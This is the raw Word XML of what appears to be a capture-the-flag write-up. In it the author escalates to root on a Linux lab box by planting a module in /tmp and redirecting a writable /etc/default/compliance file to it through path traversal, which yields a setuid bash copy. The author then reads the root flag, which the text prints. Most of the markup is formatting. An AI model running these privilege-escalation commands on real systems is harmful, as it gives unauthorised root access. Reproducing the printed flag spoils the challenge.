          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DBA0EE1" wp14:editId="57331759">
            <wp:extent cx="5943600" cy="251460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1264032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03251" name="Picture 12640325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20EFF" w14:textId="031D45DE" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>3- i tried to see detailed info about /etc and /etc/default by this command 'ls -ld /etc /etc/default'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EA42A" w14:textId="0B88E2D2" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D72471E" wp14:editId="1B8A2B82">
            <wp:extent cx="3848637" cy="609685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1107265629" name="Picture 3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265629" name="Picture 3" descr="A black background with white text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742C0" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">4- i tried to check if /compliance file exists and is permisstions by this command 'ls -l /etc/default/compliance /tmp/compliance.bak /tmp/root_listing /tmp/flag* 2&gt;/dev/null || true'  and it returned it can has all permisiions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7503ABBF" w14:textId="25B0067F" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF5EEB5" wp14:editId="5E2F8132">
            <wp:extent cx="5943600" cy="275590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32288735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887359" name="Picture 32288735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74796" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>5- so i decided to take copy of it 'cat /tmp/compliance.bak &gt; /etc/default/compliance &amp;&amp; echo "restored"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B727CF2" w14:textId="5D6BBB25" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">6- it returned error so i decided to run combination of commands to copy the root bash it seslf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230130C" w14:textId="0E330C77" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/evil &amp;&amp; cat &gt;/tmp/evil/module.sh &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957A9F8" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>check_exfil(){ cp /bin/bash /tmp/rootbash 2&gt;/dev/null || true; chmod 4755 /tmp/rootbash 2&gt;/dev/null || true; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63207D89" w14:textId="5771F1D1" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B42376" w14:textId="446DEE9F" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>chmod 644 /tmp/evil/module.sh &amp;&amp; echo 'COMPLIANCE_MODE=../../tmp/evil' &gt; /etc/default/compliance &amp;&amp; sleep 65 &amp;&amp; /tmp/rootbash -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C12807" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">what these commands do : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8948B" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">- creates /tmp/evil and writes file /tmmp/evil/module.sh contains check_exfil function that attemps to copy /bin/bash to /tmp/rootbash and returns no error </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62275A5B" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">- then by chmod 4755 we make it can be run by any user by makes it setuid root executable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2484D" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>- Overwrites /etc/default/compliance with COMPLIANCE_MODE=../../tmp/evil. Many services/source scripts read that file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C7363" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">-  then we make the sleep function to allow some processes to execute the module </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C36665" w14:textId="77777777" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>- then we run the copies bash with -p flag /tmp/rootbash -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EEB754" w14:textId="4868130B" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>- finally we got root shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FDC8F3" w14:textId="1B1268F4" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C512020" wp14:editId="20EE3222">
            <wp:extent cx="5943600" cy="738505"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="2118365965" name="Picture 6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365965" name="Picture 6" descr="A screen shot of a computer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A8D58" w14:textId="61E87D12" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>7- we can search for the flag by listing all directories and grep text by this 'ls -la /root /home /var/www /tmp /opt /usr/local 2&gt;/dev/null | grep -i "flag"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0595D954" w14:textId="1E29128D" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B97D45" wp14:editId="387BCC67">
            <wp:extent cx="5943600" cy="509270"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="498882541" name="Picture 7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882541" name="Picture 7" descr="A black background with white text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EE961" w14:textId="7F5F62FE" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">8- we open the file content by 'cat /root/flag_HY6vXY' and we got the flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA5E60" w14:textId="5F98AE30" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>"CyCTF{wjN7D-IdYdYupbQLhftMmz6QZnKqpt9sJJnYxxtjGKDwK-a1vfELh0rvQBrhgb3hB7kX2GtuTuuogFhY8NydXAOYpRLBfXfkXXeS}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198F5B6C" w14:textId="0B76BEB7" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="657F23A2" wp14:editId="090DCA48">
            <wp:extent cx="5943600" cy="375920"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="136370272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702724" name="Picture 136370272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7124" w:rsidRPr="00DC7124">
      <w:headerReference w:type="default" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId1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CB3B15" w14:textId="77777777" w:rsidR="001176A0" w:rsidRDefault="001176A0" w:rsidP="00AA2066">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4E4A7EDE" w14:textId="77777777" w:rsidR="001176A0" w:rsidRDefault="001176A0" w:rsidP="00AA20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42297448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4BF4FF5D" w14:textId="646DD0AD" w:rsidR="00AA2066" w:rsidRDefault="00AA2066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4A105CC8" w14:textId="77777777" w:rsidR="00AA2066" w:rsidRDefault="00AA206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A32BFC" w14:textId="77777777" w:rsidR="001176A0" w:rsidRDefault="001176A0" w:rsidP="00AA2066">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3C12A358" w14:textId="77777777" w:rsidR="001176A0" w:rsidRDefault="001176A0" w:rsidP="00AA20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F2864" w14:textId="3736C2F4" w:rsidR="00B46D38" w:rsidRPr="007E1517" w:rsidRDefault="007E1517" w:rsidP="006B1E57">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Amasis MT Pro Black" w:hAnsi="Amasis MT Pro Black" w:cs="Calibri"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="007E1517">
      <w:rPr>
        <w:rFonts w:ascii="Amasis MT Pro Black" w:hAnsi="Amasis MT Pro Black"/>
        <w:noProof/>
      </w:rPr>
      <w:t>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D2D08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD7CE028"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="510" w:hanging="51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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="285C104A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FC250A0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalZero"/>
      <w:pStyle w:val="TechnicalTable"/>
      <w:lvlText w:val="V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-32767" w:firstLine="32767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3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3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" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="29333E41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0242F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316927"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98543B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74180D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C820FC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216402"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD9A8E48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2D3070C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C0EC256"/>
    <w:lvl w:ilvl="0" w:tplc="A5AC41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426B65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C68806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504F12"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD1E779A"/>
    <w:lvl w:ilvl="0" w:tplc="3AE6D27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336437E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7F684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D105F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAB854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AC005C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEF2A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9C6004"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8CE6D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0C1873"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="775A2F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262659"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF9A4C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923094"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7400A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F433661"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0498B1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AB3BC5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F069DB8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="162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3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3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" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="76DB0F92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FF18DD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6EA312A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B03C85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5462857">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1844978469">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1009603069">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:pStyle w:val="Heading1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Heading2"/>
        <w:lvlText w:val="%1.%2"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="720" w:hanging="720"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:pStyle w:val="Heading3"/>
        <w:lvlText w:val="%1.%2.%3"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="36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4" w16cid:durableId="1205405582">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:pStyle w:val="Heading1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Heading2"/>
        <w:lvlText w:val="%1.%2."/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="360" w:hanging="360"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:pStyle w:val="Heading3"/>
        <w:lvlText w:val="%1.%2.%3."/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="-32767" w:firstLine="32767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36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36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3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36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36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60" w:hanging="360"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1827014290">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1376924903">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1066956664">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1659066759">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2052462166">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1994942108">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="286858210">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1081947982">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1248612588">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="528296576">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1780293043">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="554901653">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="883635498">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="759763131">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="686911279">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1459644423">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="2017877920">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="18241043">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="2017026763">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="65996966">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1435781024">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1644264767">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1570922357">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="252127890">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="793905951">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="5493173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0695"/>
    <w:rsid w:val="00000384"/>
    <w:rsid w:val="00013217"/>
    <w:rsid w:val="00020572"/>
    <w:rsid w:val="00022883"/>
    <w:rsid w:val="00025437"/>
    <w:rsid w:val="00045245"/>
    <w:rsid w:val="0004708C"/>
    <w:rsid w:val="00051387"/>
    <w:rsid w:val="0005227E"/>
    <w:rsid w:val="00052B45"/>
    <w:rsid w:val="0006049E"/>
    <w:rsid w:val="00070A97"/>
    <w:rsid w:val="00072B1C"/>
    <w:rsid w:val="00082A07"/>
    <w:rsid w:val="00092006"/>
    <w:rsid w:val="00092CD4"/>
    <w:rsid w:val="00096FF4"/>
    <w:rsid w:val="000A4047"/>
    <w:rsid w:val="000A5C95"/>
    <w:rsid w:val="000B3391"/>
    <w:rsid w:val="000B7F33"/>
    <w:rsid w:val="000C0021"/>
    <w:rsid w:val="000C1E8C"/>
    <w:rsid w:val="000D0231"/>
    <w:rsid w:val="000D2F0C"/>
    <w:rsid w:val="000E0ED5"/>
    <w:rsid w:val="000E74DF"/>
    <w:rsid w:val="000F1B30"/>
    <w:rsid w:val="000F2BAD"/>
    <w:rsid w:val="000F6C18"/>
    <w:rsid w:val="00104C63"/>
    <w:rsid w:val="001142C5"/>
    <w:rsid w:val="00114A02"/>
    <w:rsid w:val="00114ACB"/>
    <w:rsid w:val="001176A0"/>
    <w:rsid w:val="00124202"/>
    <w:rsid w:val="00126D67"/>
    <w:rsid w:val="00153EA7"/>
    <w:rsid w:val="00162027"/>
    <w:rsid w:val="00167442"/>
    <w:rsid w:val="001702FD"/>
    <w:rsid w:val="00190C9C"/>
    <w:rsid w:val="0019167C"/>
    <w:rsid w:val="0019625E"/>
    <w:rsid w:val="001A19FB"/>
    <w:rsid w:val="001B2E61"/>
    <w:rsid w:val="001D0A5A"/>
    <w:rsid w:val="001D4A69"/>
    <w:rsid w:val="001E2A17"/>
    <w:rsid w:val="001E7E78"/>
    <w:rsid w:val="001E7FB0"/>
    <w:rsid w:val="001F03DD"/>
    <w:rsid w:val="001F044E"/>
    <w:rsid w:val="001F093C"/>
    <w:rsid w:val="001F0BF2"/>
    <w:rsid w:val="001F4853"/>
    <w:rsid w:val="001F4A93"/>
    <w:rsid w:val="001F7AA6"/>
    <w:rsid w:val="002021F9"/>
    <w:rsid w:val="00223ED7"/>
    <w:rsid w:val="00224779"/>
    <w:rsid w:val="00224800"/>
    <w:rsid w:val="00231FFC"/>
    <w:rsid w:val="00233995"/>
    <w:rsid w:val="00234AC7"/>
    <w:rsid w:val="002412E9"/>
    <w:rsid w:val="002419E5"/>
    <w:rsid w:val="00244AFC"/>
    <w:rsid w:val="0026039B"/>
    <w:rsid w:val="00261CF9"/>
    <w:rsid w:val="00266EB7"/>
    <w:rsid w:val="00275F23"/>
    <w:rsid w:val="00276A29"/>
    <w:rsid w:val="00284EF5"/>
    <w:rsid w:val="002879CF"/>
    <w:rsid w:val="002911E6"/>
    <w:rsid w:val="00291695"/>
    <w:rsid w:val="002A0192"/>
    <w:rsid w:val="002A0E9B"/>
    <w:rsid w:val="002B172D"/>
